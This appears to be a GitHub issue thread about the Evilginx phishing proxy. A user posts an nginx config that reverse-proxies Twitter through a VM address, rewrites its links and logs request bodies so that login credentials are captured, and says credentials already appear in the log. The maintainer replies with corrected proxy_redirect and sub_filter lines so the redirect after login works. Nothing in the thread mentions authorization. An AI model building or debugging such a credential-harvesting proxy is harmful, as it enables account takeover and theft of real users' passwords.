Twitter Config

[angelic-red]

Hi there,

Awesome project you got going on here!

I've been trying to setup a config for Twitter and I'm having a little trouble. I wanted to start small so right now the focus is to just capture the username and password in the POST request. Thus I've stripped anything I believe to be cookie / ssl related.

My config at the moment is this.

log_format twitter_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","body":"$request_body"}';
location / {
    proxy_pass https://twitter.com/;
    proxy_cookie_domain twitter.com 192.168.60.133;
    proxy_redirect https://twitter.com/ 192.168.60.133/;

    sub_filter 'https://twitter.com/' '192.168.60.133/';
    sub_filter_once off;
    sub_filter_types *;

    proxy_set_header Accept-Encoding "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

    access_log /var/log/evilginx-twitter.log twitter_phish;
}

As you've probably noticed, I don't have a domain setup yet so I'm using a VM's IP to substitute.

I can successfully proxy Twitter. The error happens after I try to login. A request is sent to https://twitter.com/sessions to validate the form data and in /var/log/evilginx-twitter.log I can see the credentials. https://twitter.com/sessions is supposed to redirect me to twitter.com after validation but I get a proxied 404 error. My browser tried to make a request to 192.168.60.133/192.168.60.133/sessions and that is what I see in my address bar.

I think I might be using the sub_filter directive incorrectly or perhaps I'm not understanding the proxy. Would I need another config to handle requests/redirects to https://twitter.com/sessions or I not doing something right?

Regards

[kgretzky]

Hi, thanks!

I think you are missing https:// in proxy_redirect and sub_filter rules, this is why it redirects you thinking that the IP address is a relative path of the URL.

    proxy_redirect https://twitter.com/ https://192.168.60.133/;

    sub_filter 'https://twitter.com/' 'https://192.168.60.133/';

[angelic-red]

Hey kgretzky,

I tried what you suggested and I still was not successfully logged in and redirected to the legitimate twitter. Instead the web page became unreachable.

I noticed that in my requests that the origin/referrer is always the address of my VM. Could that be the culprit? In a legitimate twitter login those are set to https://twitter.com/

[kgretzky]

Try to copy the site config file from one of the included examples and modify that one instead of creating your own. Whole Evilginx functionality relies on properly crafted site config files and it is crucial that you work on current examples rather than create one from scratch.